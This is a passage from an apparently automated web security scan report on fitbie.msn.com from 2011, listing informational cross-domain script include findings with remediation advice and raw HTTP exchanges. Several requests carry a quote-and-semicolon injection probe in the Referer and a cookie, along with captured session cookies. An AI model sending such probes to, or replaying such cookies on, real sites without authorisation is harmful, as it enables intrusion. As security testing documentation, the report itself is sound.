<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

5. Cross-domain script include
There are 52 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://fitbie.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; fsbrelated=%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%20title%3D%225%20Ways%20to%20Do%20Anything%20Better%22%3E5%20Ways%20to%20Do%20Anything%20Better%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%3E%3Cimg%20src%3D%22/sites/default/files/beet-roots-cutting-board-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%20title%3D%226%20Ways%20to%20Lose%20Weight%20Naturally%20Before%20Your%20Wedding%22%3E6%20Ways%20to%20Lose%20Weight%20Naturally%20Before...%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%3E%3Cimg%20src%3D%22/sites/default/files/bride-slim-healthy-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%20title%3D%226%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%22%3E6%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%3E%3Cimg%20src%3D%22/sites/default/files/guilty-chocolate-snack-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%20title%3D%228%20Ridiculously%20Cheap%20Healthy%20Foods%22%3E8%20Ridiculously%20Cheap%20Healthy%20Foods%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%3E%3Cimg%20src%3D%22/sites/default/files/potatoes-assorted-th.jpg%22%20/%3E%3C/a%3E; _HOP=I=1&TS=1297606884; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297577225-1"
Last-Modified: Sun, 13 Feb 2011 06:07:05 +0000
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Feb 2011 14:22:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 66330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.2. http://fitbie.msn.com/cardio/seize-your-saturdays

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /cardio/seize-your-saturdays

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cardio/seize-your-saturdays HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:09 +0000
ETag: "1297607349-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42681
Expires: Mon, 14 Feb 2011 02:29:10 GMT
Date: Sun, 13 Feb 2011 14:37:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.3. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:52 +0000
ETag: "1297607332-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42765
Expires: Mon, 14 Feb 2011 02:28:53 GMT
Date: Sun, 13 Feb 2011 14:36:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /fitness-tips/tips/10-bizarre-side-effects-exercise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fitness-tips/tips/10-bizarre-side-effects-exercise HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297600923-1"
Last-Modified: Sun, 13 Feb 2011 12:42:03 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=36664
Expires: Mon, 14 Feb 2011 00:48:20 GMT
Date: Sun, 13 Feb 2011 14:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/anytime-anywhere-yoga

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/anytime-anywhere-yoga HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:02:18 +0000
ETag: "1297458138-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42795
Expires: Sat, 12 Feb 2011 09:02:41 GMT
Date: Fri, 11 Feb 2011 21:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.6. http://fitbie.msn.com/get-fit/belly-abs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/belly-abs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/belly-abs HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:10 +0000
ETag: "1297607170-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42897
Expires: Mon, 14 Feb 2011 02:25:30 GMT
Date: Sun, 13 Feb 2011 14:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.7. http://fitbie.msn.com/get-fit/cardio

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/cardio

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/cardio HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:11 +0000
ETag: "1297607171-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42930
Expires: Mon, 14 Feb 2011 02:26:05 GMT
Date: Sun, 13 Feb 2011 14:30:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.8. http://fitbie.msn.com/get-fit/fitness-tips

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/fitness-tips

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/fitness-tips HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:18 +0000
ETag: "1297607178-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42929
Expires: Mon, 14 Feb 2011 02:26:19 GMT
Date: Sun, 13 Feb 2011 14:30:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.9. http://fitbie.msn.com/get-fit/men

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/men

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/men HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:19 +0000
